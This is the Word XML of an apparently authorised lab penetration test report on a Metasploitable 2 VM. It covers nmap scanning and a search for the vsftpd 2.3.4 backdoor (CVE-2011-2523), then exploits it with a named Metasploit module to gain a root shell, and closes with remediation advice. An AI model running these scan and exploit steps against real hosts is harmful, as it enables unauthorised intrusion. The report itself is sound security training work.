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75C2F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="160" w:after="80"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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SECTION 2: METASPLOITABLE 2 PENETRATION TEST REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB6C22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2.1 Environment Setup &amp; Laboratory Isolation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C12C3">
      <w:pP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To ensure standard safety practices during the authorized engagement, the target network infrastructure was completely isolated from the external internet using an internal virtualization boundary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4525784A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Attacker Platform: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Kali Linux VM (192.168.56.101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F60EAB3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Target Asset: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Metasploitable 2 VM (192.168.56.102)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E125AB2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Network Profile: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VirtualBox Host-Only Adapter (Isolated Sandbox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1C739B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523230" cy="3176270"/>
            <wp:effectExtent l="0" t="0" r="1270" b="11430"/>
            <wp:docPr id="1" name="Picture 1" descr="vitualbox network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itualbox network setting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32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3A86492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2.2 Reconnaissance &amp; Active Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21358EF1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32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A targeted ping scan was conducted across the 192.168.56.0/24 network range to discover active network assets inside the isolated environment without generating unnecessary port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scanning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noise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:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D400F">
      <w:pP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Command Executed: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nmap -sn 10.0.2.0/24 (Initial NAT check) and ping -c 4 192.168.56.102 (Final connection baseline)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C7A1C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6"/>
          <w:lang w:val="en-US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-133985</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-414655</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6400800" cy="3742690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21549"/>
                <wp:lineTo x="21557" y="21549"/>
                <wp:lineTo x="21557" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="10" name="Picture 10" descr="hots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hotsnam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2F03C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2.3 Nmap Scanning &amp; Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223DF9F1">
      <w:pP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An aggressive port scan was initiated across all 65,535 TCP ports to map the target asset's full attack surface, followed by an administrative version scan to extract specific software banners.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DD30F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Commands Executed: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nmap -p- -T4 192.168.56.102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sudo nmap -p 21,22,80,3306 -sV -O 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415B3E5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Discovered Infrastructure Profile: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A94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1350BC7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Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="308C696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520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DADA41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Protocol / Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44E01DE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Software Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31F4D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2B5B28C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2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E69BB9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Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D9C9F7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FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="123E2A2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vsftpd 2.3.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="03F65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53DC2A8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2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22C4AB7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Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63E08A8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SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04E165B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OpenSSH 4.7p1 Debian 8ubuntu1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0B85F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548E24D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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B43711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Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E27604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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DBD41F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Apache httpd 2.2.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5AEE7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6EA368B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3306</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D2DA73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Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="069EE81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MySQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2520" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4DC33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32"/>
                <w:szCs w:val="36"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>MySQL 5.0.51a-3ubuntu5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E10271A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393180" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="9" name="Picture 9" descr="nmap p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nmap ping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CE6C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5DFE3B90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2.4 Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DED8EB">
      <w:pP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Using the offline database tool searchsploit, the exact version string of the FTP service (vsftpd 2.3.4) was checked for known security historical flaws.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2461118A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Command Executed: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searchsploit vsftpd 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9526E6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Identified Flaw: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The version contains a notorious, deliberate backdoor command execution flaw embedded inside its source distribution archive (known publicly under CVE-2011-2523).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730C9D1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32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396990" cy="899795"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1905"/>
            <wp:docPr id="4" name="Picture 4" descr="searchsploit terminal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archsploit terminal result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C72C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92F4E79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2.5 Controlled Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5FB1B1">
      <w:pP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The Metasploit Framework (msfconsole) was initialized to deploy a controlled exploit module targeting the identified vulnerability on port 21.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2764A320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Module Path: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exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47166139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Parameters Configured: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SET RHOSTS 192.168.56.102 (Target Machine)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SET LHOST 192.168.56.101 (Attacker Machine)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67826F22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-120650</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>264160</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6134100" cy="1339215"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21303"/>
                <wp:lineTo x="21555" y="21303"/>
                <wp:lineTo x="21555" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="5" name="Picture 5" descr="Metasploit interface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etasploit interface displa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Command Executed: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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78433E2E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2.6 Post-Exploitation &amp; Proof of Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C6A30">
      <w:pP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Upon triggering the backdoor payload, an interactive remote command shell session was successfully delivered back to the Kali platform. System identity queries were executed to verify the authorization level achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A93E84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Commands Executed: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getuid and sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148FCCAA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Privilege Level Achieved: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root (Complete administrative access)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24A00F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Compromised Asset Identity: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metasploitable.localdomain running Ubuntu 8.04 (Linux Kernel 2.6.24-16-server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1799D436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54600" cy="1168400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="Picture 8" descr="getu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etui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1A2E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7BFEB48C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2.7 Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538963D8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Risk Rating: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Critical (CVSS v3 Base Score: 10.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AB34F0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Analysis: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Because the vsftpd network service was running with high-level root system authority, exploitation handed the attacker absolute control over the operating system environment. An external adversary could access any confidential file, extract user password hashes from /etc/shadow, manipulate logging mechanisms to erase footprints, or leverage the machine as a pivot node to launch deeper internal corporate network compromises.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DBA445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2.8 Post-Assessment Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04612369">
      <w:pP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Following professional standards, the active session was cleanly closed immediately after collecting verification logs to leave the target application in its standard operational status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B8D196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Command Executed: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exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A310AFA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-44450</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5018405" cy="1511300"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21418"/>
                <wp:lineTo x="21537" y="21418"/>
                <wp:lineTo x="21537" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="7" name="Picture 7" descr="Metasploit terminal showing clo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Metasploit terminal showing clos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62944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6156FADA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5283E442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37F6A3CC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7066CEDB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64E3440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11016CD2">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="160" w:after="80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2.9 Recommended Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D39EB11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Update/Replace Software Component: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Completely remove the compromised legacy vsftpd 2.3.4 software package. Upgrade to a modern, actively supported, and cryptographically verified release of vsftpd (or alternative stable daemons like proftpd).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9D523D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Enforce Code Authenticity Controls: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Implement strict cryptographic checksum and hash verification checks for all software source distribution packages prior to building them inside the environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1C43D6">
      <w:pPr>
        <w:spacing w:after="60"/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 xml:space="preserve">Network-Level Filtering: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman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Restrict access to Port 21 (FTP) via internal firewalls, allowing connectivity only to specific authorized administrator source IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8D4D79"/>
    <w:sectPr>
      <w:footerReference r:id="rId5" w:type="default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8B565">
    <w:pPr>
      <w:pStyle w:val="6"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:sz w:val="16"/>
      </w:rPr>
      <w:t>Penetration Testing Report | Authorized Laboratory Environment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405D01"/>
    <w:rsid w:val="06405D01"/>
    <w:rsid w:val="48C5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2026-09-04T14:14:00Z</dcterms:created>
  <dc:creator>admin</dc:creator>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-04T14:25:17Z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1DDB8B382F8B45C89C094F5E4DD030E9_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiYjhiNjNjNDc2ZWM5ZjlkYTQyNzM0ZGRmYzczM2EwMmIifQ==</vt:lpwstr>
  </property>
</Properties>
</file>